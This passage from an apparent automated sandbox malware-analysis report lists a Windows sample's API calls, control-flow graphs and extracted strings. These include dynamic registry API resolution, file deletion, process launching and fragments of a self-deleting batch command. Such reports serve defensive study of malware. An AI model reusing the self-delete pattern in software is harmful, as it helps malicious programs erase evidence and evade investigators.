                          • LoadLibraryW.KERNELBASE(advapi32.dll,00000000,?,001E6949,?,?,?), ref: 001E51DF
                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 001E51F9
                          • GetProcAddress.KERNEL32(?,RegQueryValueW), ref: 001E5205
                          • GetProcAddress.KERNEL32(?,RegSetValueW), ref: 001E5212
                          • GetProcAddress.KERNEL32(?,RegQueryValueExW), ref: 001E521F
                          • GetProcAddress.KERNEL32(?,RegSetValueExW), ref: 001E522C
                          • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 001E5239
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: RegCloseKey$RegCreateKeyExW$RegQueryValueExW$RegQueryValueW$RegSetValueExW$RegSetValueW$advapi32.dll
                          • API String ID: 2238633743-2643583418
                          • Opcode ID: dbee8c0b595035dbb0c39b79a3ac5b57110c681252a4937bd86e16f86a989cf9
                          • Instruction ID: 6b34c86f61133ff5b430bb708cb0b024a5885ca2ae7c661eaf9bf82aab6cfe7e
                          • Opcode Fuzzy Hash: dbee8c0b595035dbb0c39b79a3ac5b57110c681252a4937bd86e16f86a989cf9
                          • Instruction Fuzzy Hash: 6811CFF1A50B87FFCB108F6A8984805FEB5BB6A315704862A951982A41C7B4E4A0CFE1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1211 1f7c90-1f7cc3 1212 1f7cc7-1f7cd0 DeleteFileW 1211->1212 1213 1f7cc5 1211->1213 1214 1f7cd9-1f7ce2 1212->1214 1215 1f7cd2-1f7cd4 1212->1215 1213->1212 1216 1f7ce9-1f7d22 call 21ef4e 1214->1216 1217 1f7ce4-1f7ce6 1214->1217 1218 1f81a6-1f81c1 call 21af96 1215->1218 1223 1f7d4c-1f7d51 1216->1223 1224 1f7d24-1f7d47 call 21c190 1216->1224 1217->1216 1226 1f7d57-1f7d62 1223->1226 1227 1f81c2 call 1e2330 1223->1227 1232 1f7e39-1f7e5a call 1f7520 1224->1232 1229 1f7d6b-1f7d78 1226->1229 1230 1f7d64-1f7d69 1226->1230 1234 1f81c7 call 21f174 1227->1234 1235 1f7d7a-1f7d7f 1229->1235 1236 1f7d81-1f7d86 1229->1236 1233 1f7d8c-1f7d97 1230->1233 1249 1f7e8e-1f7ea5 1232->1249 1250 1f7e5c-1f7e6e 1232->1250 1240 1f7d9e-1f7da4 1233->1240 1241 1f7d99-1f7d9c 1233->1241 1245 1f81cc call 21f174 1234->1245 1239 1f7d89 1235->1239 1236->1239 1239->1233 1242 1f7da6-1f7db9 call 21b1a7 1240->1242 1243 1f7dca-1f7dcc 1240->1243 1241->1242 1242->1234 1260 1f7dbf-1f7dc8 1242->1260 1247 1f7dce-1f7dd9 call 21b1a7 1243->1247 1248 1f7ddb 1243->1248 1259 1f81d1 call 1e2330 1245->1259 1256 1f7ddd-1f7e02 call 21c710 1247->1256 1248->1256 1257 1f7eae-1f7eb7 1249->1257 1258 1f7ea7-1f7ea9 1249->1258 1254 1f7e84-1f7e8b call 21b1d7 1250->1254 1255 1f7e70-1f7e7e 1250->1255 1254->1249 1255->1245 1255->1254 1273 1f7e36 1256->1273 1274 1f7e04-1f7e16 1256->1274 1264 1f7ebe-1f7ef4 call 21ef4e 1257->1264 1265 1f7eb9-1f7ebb 1257->1265 1258->1218 1268 1f81d6 call 21f174 1259->1268 1260->1256 1275 1f7f1e-1f7f23 1264->1275 1276 1f7ef6-1f7f19 call 21c190 1264->1276 1265->1264 1277 1f81db call 21f174 1268->1277 1273->1232 1278 1f7e2c-1f7e33 call 21b1d7 1274->1278 1279 1f7e18-1f7e26 1274->1279 1275->1259 1283 1f7f29-1f7f34 1275->1283 1289 1f800c-1f8032 call 1f73f0 1276->1289 1286 1f81e0 call 21f174 1277->1286 1278->1273 1279->1234 1279->1278 1287 1f7f3d-1f7f4a 1283->1287 1288 1f7f36-1f7f3b 1283->1288 1295 1f81e5-1f81ea call 21f174 1286->1295 1292 1f7f4c-1f7f51 1287->1292 1293 1f7f53-1f7f57 1287->1293 1291 1f7f5a-1f7f65 1288->1291 1302 1f8069-1f807f 1289->1302 1303 1f8034-1f8046 1289->1303 1296 1f7f6c-1f7f72 1291->1296 1297 1f7f67-1f7f6a 1291->1297 1292->1291 1293->1291 1300 1f7f74-1f7f8c call 21b1a7 1296->1300 1301 1f7f9d-1f7f9f 1296->1301 1297->1300 1300->1234 1314 1f7f92-1f7f9b 1300->1314 1304 1f7fae 1301->1304 1305 1f7fa1-1f7fac call 21b1a7 1301->1305 1302->1258 1313 1f8085-1f808b 1302->1313 1309 1f805c-1f8066 call 21b1d7 1303->1309 1310 1f8048-1f8056 1303->1310 1312 1f7fb0-1f7fd5 call 21c710 1304->1312 1305->1312 1309->1302 1310->1277 1310->1309 1323 1f8009 1312->1323 1324 1f7fd7-1f7fe9 1312->1324 1318 1f808f-1f809a DeleteFileW 1313->1318 1319 1f808d 1313->1319 1314->1312 1318->1215 1322 1f80a0-1f80c7 call 1f97a0 1318->1322 1319->1318 1330 1f80df-1f80e3 1322->1330 1331 1f80c9-1f80d9 DeleteFileW 1322->1331 1323->1289 1326 1f7fff-1f8006 call 21b1d7 1324->1326 1327 1f7feb-1f7ff9 1324->1327 1326->1323 1327->1268 1327->1326 1333 1f80e7-1f8109 call 1e1fbc call 1f73f0 1330->1333 1334 1f80e5 1330->1334 1331->1330 1332 1f80db-1f80dd 1331->1332 1336 1f8153-1f8160 1332->1336 1347 1f813d-1f814f 1333->1347 1348 1f810b-1f811d 1333->1348 1334->1333 1339 1f8162-1f8174 1336->1339 1340 1f8190-1f819f 1336->1340 1341 1f8186-1f818d call 21b1d7 1339->1341 1342 1f8176-1f8184 1339->1342 1340->1218 1341->1340 1342->1295 1342->1341 1347->1336 1349 1f811f-1f812d 1348->1349 1350 1f8133-1f813a call 21b1d7 1348->1350 1349->1286 1349->1350 1350->1347
                          APIs
                          • DeleteFileW.KERNEL32(?,1FE05385,?,?,00000000), ref: 001F7CC8
                          • _wcslen.LIBCMT ref: 001F7D0C
                          • _wcslen.LIBCMT ref: 001F7EE1
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 001F8096
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 001F80D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: DeleteFile$_wcslen
                          • String ID:
                          • API String ID: 2643169976-0
                          • Opcode ID: a5c69fe423b2e281e78d55631a80aa5486ad76ad4c907015e062a6e765516b4a
                          • Instruction ID: 506a7722382fd2b2a29af725fc9ebfb24194d5eb682b725ba9b120ade7e9639f
                          • Opcode Fuzzy Hash: a5c69fe423b2e281e78d55631a80aa5486ad76ad4c907015e062a6e765516b4a
                          • Instruction Fuzzy Hash: CEF1F171910109DFCB04DFA8C8956FEBBB1AF45324F200229E625E72D1DB319A45CBA1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000003,?,00221789,00000003,002445D0,0000000C,002218E0,00000003,00000002,00000000,?,00222A4D,00000003), ref: 002217D4
                          • TerminateProcess.KERNEL32(00000000,?,00221789,00000003,002445D0,0000000C,002218E0,00000003,00000002,00000000,?,00222A4D,00000003), ref: 002217DB
                          • ExitProcess.KERNEL32 ref: 002217ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 191d7e6a05fcb8e17162759e34f05c7ca14a5cba434099af63a268c0f8c74ca6
                          • Instruction ID: 68a5db0688470caabb37dcf8f8aaeaa8856cb92b03cfc1a999343058eed776ad
                          • Opcode Fuzzy Hash: 191d7e6a05fcb8e17162759e34f05c7ca14a5cba434099af63a268c0f8c74ca6
                          • Instruction Fuzzy Hash: C0E0B631011218BBCF166FA4ED9DE487BA9EB91781F514024F9498A121CB35ED62CA50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fefeadbd2fe86053e8f72c54b201b9ab2c5038a79406d4a44ab31160c8ac6902
                          • Instruction ID: 4c619be730093c002110619a7f3a500ea408ec5a7f5c31717817ea15abb9b635
                          • Opcode Fuzzy Hash: fefeadbd2fe86053e8f72c54b201b9ab2c5038a79406d4a44ab31160c8ac6902
                          • Instruction Fuzzy Hash: 9D624E715187428FC724EF24C491AAFB7E5FFA8304F10492DF89997292DB30E995CB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1eb901-1eb998 GetDesktopWindow call 1e8fe7 call 1e3586 GetCommandLineW CommandLineToArgvW 5 1eb99e-1eb9a5 0->5 6 1ebc87-1ebca0 call 1eb542 0->6 8 1eb9ab-1eb9c9 call 1e1fbc call 1e48d2 5->8 9 1ebc80-1ebc81 LocalFree 5->9 12 1ebcdc-1ebce4 call 1eb57f 6->12 13 1ebca2-1ebcaa 6->13 21 1eb9cf-1eb9df call 1e48d2 8->21 22 1ebc47-1ebc4c 8->22 9->6 19 1ebce9 12->19 13->12 16 1ebcac-1ebcd7 call 1e3449 call 1faa54 call 1e23e5 call 1e203f 13->16 16->12 23 1ebceb-1ebd19 call 1e203f * 3 call 1e9160 call 1e9226 19->23 21->22 36 1eb9e5-1eb9f5 call 1e48d2 21->36 27 1ebd35-1ebd41 call 1e203f 22->27 28 1ebc52-1ebc5d call 21ef4e 22->28 60 1ebd1e-1ebd34 call 21af96 23->60 27->23 40 1ebc61-1ebc63 call 1e206a 28->40 36->22 49 1eb9fb-1eba0b call 1e48d2 36->49 48 1ebc68-1ebc76 call 1e203f 40->48 48->8 57 1ebc7c 48->57 49->22 58 1eba11-1eba21 call 1e48d2 49->58 57->9 65 1ebc2b-1ebc30 58->65 66 1eba27-1eba37 call 1e48d2 58->66 65->27 67 1ebc36-1ebc45 call 21ef4e 65->67 66->65 71 1eba3d-1eba4d call 1e48d2 66->71 67->40 71->65 75 1eba53-1eba63 call 1e48d2 71->75 75->65 78 1eba69-1eba79 call 1e48d2 75->78 81 1eba7f-1eba8f call 1e48d2 78->81 82 1ebc24-1ebc29 78->82 81->82 85 1eba95-1ebaa5 call 1e48d2 81->85 82->48 85->82 88 1ebaab-1ebabb call 1e48d2 85->88 88->82 91 1ebac1-1ebad1 call 1e48d2 88->91 91->82 94 1ebad7-1ebae7 call 1e48d2 91->94 94->82 97 1ebaed-1ebafd call 1e48d2 94->97 97->82 100 1ebb03-1ebb13 call 1e48d2 97->100 100->82 103 1ebb19-1ebb29 call 1e48d2 100->103 106 1ebb2f-1ebb3f call 1e48d2 103->106 107 1ebc1d-1ebc22 103->107 106->107 110 1ebb45-1ebb55 call 1e48d2 106->110 107->48 110->107 113 1ebb5b-1ebb6b call 1e48d2 110->113 113->107 116 1ebb71-1ebb81 call 1e48d2 113->116 119 1ebb83-1ebb93 call 1e48d2 116->119 120 1ebc01-1ebc06 116->120 119->120 125 1ebb95-1ebba5 call 1e48d2 119->125 120->27 121 1ebc0c-1ebc1b call 21ef4e 120->121 121->40 125->120 129 1ebba7-1ebbb7 call 1e48d2 125->129 129->120 132 1ebbb9-1ebbc9 call 1e48d2 129->132 132->120 135 1ebbcb-1ebbdb call 1e48d2 132->135 135->120 138 1ebbdd-1ebbed call 1e48d2 135->138 138->120 141 1ebbef-1ebbff call 1e48d2 138->141 141->48 141->120
                          APIs
                          • GetDesktopWindow.USER32 ref: 001EB924
                            • Part of subcall function 001E8FE7: CreateSolidBrush.GDI32(00FFFFFF), ref: 001E9102
                          • GetCommandLineW.KERNEL32(?), ref: 001EB987
                          • CommandLineToArgvW.SHELL32(00000000), ref: 001EB98E
                          • LocalFree.KERNEL32(00000000), ref: 001EBC81
                            • Part of subcall function 001E1FBC: _wcslen.LIBCMT ref: 001E1FD5
                            • Part of subcall function 001E48D2: _wcslen.LIBCMT ref: 001E48D9
                          • _wcslen.LIBCMT ref: 001EBC11
                          • _wcslen.LIBCMT ref: 001EBC3B
                          • _wcslen.LIBCMT ref: 001EBC57
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$CommandLine$ArgvBrushCreateDesktopFreeLocalSolidWindow
                          • String ID: -S1$-S2$-SP$-Sp$-s1$-s2$-sP$-sp$/S1$/S2$/SP$/Sp$/s1$/s2$/sP$/sp
                          • API String ID: 2317144623-3438277477
                          • Opcode ID: 1bb973359d9729c7d8273100a7f9254a459fd6218212253ae6744ff992da52dd
                          • Instruction ID: acb2a662b8406120fd9925ede77adeed98107bcdcb57ab6e958c4ece2ccaa89d
                          • Opcode Fuzzy Hash: 1bb973359d9729c7d8273100a7f9254a459fd6218212253ae6744ff992da52dd
                          • Instruction Fuzzy Hash: 70A13D7010CAC187CB19EF52D8959AFB7A8AFB1344F500829F9C6131A2DF319D5ACB93

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 144 1eb123-1eb17a call 21cc90 * 2 GetModuleFileNameW 149 1eb180-1eb195 GetEnvironmentVariableW 144->149 150 1eb531 144->150 149->150 151 1eb19b-1eb1d2 call 1e3324 call 1f2670 149->151 152 1eb533-1eb541 call 21af96 150->152 159 1eb51b-1eb52c call 1e203f call 1f2570 151->159 160 1eb1d8-1eb202 call 1e248d call 1f78a0 151->160 159->150 168 1eb208-1eb2d0 call 21ef4e call 1e25a8 call 21ef4e call 1e25a8 call 21ef4e call 1e25a8 call 21ef4e call 1e25a8 call 21ef4e call 1e25a8 call 1f53a0 call 1f5480 160->168 169 1eb510-1eb516 call 1e203f 160->169 195 1eb4fa-1eb50b call 1f5410 call 1e203f 168->195 196 1eb2d6-1eb2f1 call 1f6570 168->196 169->159 195->169 201 1eb4ef-1eb4f5 call 1eb892 196->201 202 1eb2f7-1eb319 196->202 201->195 202->201 205 1eb31f-1eb321 202->205 205->201 206 1eb327-1eb32a 205->206 206->201 207 1eb330-1eb344 WriteFile 206->207 207->201 208 1eb34a-1eb350 207->208 208->201 209 1eb356-1eb363 call 1f55d0 208->209 209->201 212 1eb369-1eb436 call 21cc90 call 1e3470 call 1e23e5 call 1e203f call 21ef4e call 1e25a8 call 1e8191 call 1e818d 209->212 229 1eb438 212->229 230 1eb459-1eb468 ShellExecuteExW 212->230 231 1eb43a-1eb457 call 1f7c90 229->231 230->201 232 1eb46e-1eb480 SetPriorityClass 230->232 231->230 232->201 234 1eb482-1eb492 GetCurrentProcess SetPriorityClass 232->234 234->201 236 1eb494-1eb4ab GetCurrentThread SetThreadPriority call 1eb892 234->236 238 1eb4b0-1eb4e9 call 1f5410 call 1e203f * 3 call 1f2570 236->238 238->150 249 1eb4eb-1eb4ed 238->249 249->152
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 001EB172
                          • GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000104,?,?,?,?,?,00000000), ref: 001EB18D
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24AD
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24C8
                            • Part of subcall function 001F7C90: MoveFileExW.KERNELBASE(?,?,0000000B,1FE05385,?,?,7FFFFFFE), ref: 001F78ED
                          • _wcslen.LIBCMT ref: 001EB229
                          • _wcslen.LIBCMT ref: 001EB243
                          • _wcslen.LIBCMT ref: 001EB262
                          • _wcslen.LIBCMT ref: 001EB27C
                          • _wcslen.LIBCMT ref: 001EB29B
                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,if not exist ",00000000,?,?,?,?,?,?,00000000), ref: 001EB33C
                            • Part of subcall function 001F55D0: CloseHandle.KERNEL32(?,001EB2CE,?,"&%0)), ref: 001F55E1
                            • Part of subcall function 001E3470: _wcslen.LIBCMT ref: 001E348B
                            • Part of subcall function 001E3470: _wcslen.LIBCMT ref: 001E34A2
                          • _wcslen.LIBCMT ref: 001EB3C2
                          • ShellExecuteExW.SHELL32(?), ref: 001EB460
                          • SetPriorityClass.KERNELBASE(?,00000040,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001EB47C
                          • GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001EB487
                          • SetPriorityClass.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001EB48E
                          • GetCurrentThread.KERNEL32 ref: 001EB496
                          • SetThreadPriority.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001EB49D
                            • Part of subcall function 001F7C90: DeleteFileW.KERNEL32(?,1FE05385,?,?,00000000), ref: 001F7CC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$File$Priority$ClassCurrentThread$CloseDeleteEnvironmentExecuteHandleModuleMoveNameProcessShellVariableWrite
                          • String ID: " (del %0) else (ping 127.0.0.1 -n 2&del "$"&%0)$.bat$/c "$COMSPEC$if not exist "
                          • API String ID: 621982200-1422638397
                          • Opcode ID: e4773a67ad18447534395fd24691a9fb9826f806151cc40aca1cd40e790a4f52
                          • Instruction ID: a275aa7a775199a1422ecbf9f7208e7457dd7ca990a4ab15b4fb1672a12b2ccd
                          • Opcode Fuzzy Hash: e4773a67ad18447534395fd24691a9fb9826f806151cc40aca1cd40e790a4f52
                          • Instruction Fuzzy Hash: 63A140B19156689BDB24EF21DC95BEEB778AF14340F4000E9E609A7191EF309F85CFA4

                          Control-flow Graph

                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 001E9BDD
                          • SetWindowTextW.USER32(?,?), ref: 001E9C0A
                          • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 001E9C14
                          • GetDlgItem.USER32(?,000003EA), ref: 001E9C2A
                          • SetWindowTextW.USER32(?,?), ref: 001E9C57
                          • EnableWindow.USER32(?,00000001), ref: 001E9C62
                          • GetDlgItem.USER32(?,000003EC), ref: 001E9C78
                          • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 001E9C80
                          • GetDlgItem.USER32(?,000003ED), ref: 001E9C8E
                          • EnableWindow.USER32(00000000,00000000), ref: 001E9C9A
                          • GetDlgItem.USER32(?,?), ref: 001E9CAE
                          • SetWindowTextW.USER32(?,?), ref: 001E9CE0
                          • GetDlgItem.USER32(?,000003EB), ref: 001E9CFE
                          • GetWindowRect.USER32(00000000,?), ref: 001E9D0F
                          • ScreenToClient.USER32(?,?), ref: 001E9D28
                          • SetWindowPos.USER32(00000000,000000FE,?,?,?,?,00000044,?,00000000), ref: 001E9D4D
                          • GetDlgItem.USER32(?,000003F0), ref: 001E9D5A
                          • ShowWindow.USER32(00000000,00000005,?,00000000), ref: 001E9D67
                          • GetDlgItem.USER32(?,000003F0), ref: 001E9D7E
                          • ShowWindow.USER32(00000000,00000000,?,00000000), ref: 001E9D8A
                          • GetDlgItem.USER32(?,000003EB), ref: 001E9D9E
                          • GetWindowRect.USER32(00000000,?), ref: 001E9DAF
                          • ScreenToClient.USER32(?,?), ref: 001E9DC8
                          • SetWindowPos.USER32(00000000,000000FE,?,?,?,?,00000044,?,00000000), ref: 001E9DED
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Window$Item$Text$CallbackClientDispatcherEnableRectScreenShowUser
                          • String ID:
                          • API String ID: 3420555259-0
                          • Opcode ID: fc7eb0937493d4d83a699e5dc5a20fdc53958620b4dde9b0e97077720b6dfc61
                          • Instruction ID: 2f0628d55ae9cfaf55f7f2bcb64568b3606c831e65298e1a5928d79e0d1bec96
                          • Opcode Fuzzy Hash: fc7eb0937493d4d83a699e5dc5a20fdc53958620b4dde9b0e97077720b6dfc61
                          • Instruction Fuzzy Hash: 8A812B71A0064AEFDF119FE9EDDD9AEBBB9FF08300F144529F915A21A0DB319945CB20

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 295 1e6100-1e615f call 21cc90 GetCurrentDirectoryW 298 1e6169-1e616b 295->298 299 1e6161-1e6167 295->299 300 1e6172-1e61aa call 1f3310 298->300 299->300 303 1e6773-1e678c call 1e1fed call 21af96 300->303 304 1e61b0-1e61bc 300->304 305 1e6750-1e6756 304->305 307 1e675c-1e6764 305->307 308 1e61c1-1e61e4 call 1e241c call 1ec210 305->308 307->303 311 1e6766-1e676d SetCurrentDirectoryW 307->311 317 1e61ea-1e622c call 1e6d61 308->317 318 1e6737-1e674a call 1e203f 308->318 311->303 323 1e622e-1e6234 317->323 324 1e62a5-1e631a call 1e241c call 1ec140 call 1e336e call 1e23e5 call 1e203f 317->324 318->305 325 1e6238-1e6278 SetCurrentDirectoryW call 1e336e call 1e23e5 call 1e203f call 1e607e 323->325 326 1e6236 323->326 349 1e63b3-1e63d4 call 1eef50 call 1e241c 324->349 350 1e6320-1e6322 324->350 344 1e627e-1e62a0 call 1f4370 call 1e23e5 call 1e203f 325->344 345 1e671b-1e6731 call 1e1fed call 1e203f 325->345 326->325 375 1e6628-1e662a 344->375 345->318 369 1e6428-1e643d call 1f12c0 349->369 370 1e63d6-1e63f1 call 1eea00 call 1eefc0 349->370 354 1e6325-1e6332 call 1e1f47 350->354 364 1e6334-1e6353 call 21ef4e call 1e25a8 354->364 365 1e6373-1e6375 354->365 394 1e6357-1e6371 call 1e25a8 call 21ef4e 364->394 395 1e6355 364->395 371 1e6377-1e637f call 1e3157 365->371 372 1e6384-1e638a 365->372 387 1e6443-1e64e0 call 1ec010 call 21cc90 369->387 388 1e6571-1e6578 369->388 392 1e63f6-1e63f8 370->392 371->372 373 1e638e 372->373 374 1e638c 372->374 380 1e6391-1e63a6 call 1e25a8 373->380 374->373 375->345 383 1e6630-1e667a call 1e3306 call 1e3449 call 1faa54 375->383 380->349 402 1e63a8-1e63ae 380->402 428 1e667c-1e66b8 call 21ef4e call 1e25a8 * 2 383->428 429 1e66bd-1e6716 call 1e47dc MessageBoxW call 1e203f * 2 383->429 424 1e64ea-1e64fe 387->424 425 1e64e2-1e64e8 387->425 397 1e657e-1e658b 388->397 398 1e657a-1e657c 388->398 400 1e641d-1e6423 call 1e203f 392->400 401 1e63fa-1e6418 call 1e1f8e call 1edd80 392->401 394->380 395->394 405 1e6592-1e65d2 ShellExecuteW 397->405 398->405 400->369 401->400 402->354 411 1e65f6-1e6622 call 1e203f * 4 405->411 412 1e65d4-1e65f1 call 1f4370 call 1e23e5 call 1e203f 405->412 411->375 412->411 426 1e6504-1e651d ShellExecuteExW 424->426 425->426 431 1e651f-1e653c call 1f4370 call 1e23e5 call 1e203f 426->431 432 1e6541-1e654a 426->432 428->429 429->345 431->432 432->411 440 1e6550-1e656c WaitForSingleObject CloseHandle 432->440 440->411
                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 001E6157
                          • SetCurrentDirectoryW.KERNEL32(00000000), ref: 001E676D
                            • Part of subcall function 001EC210: _wcschr.LIBVCRUNTIME ref: 001EC25C
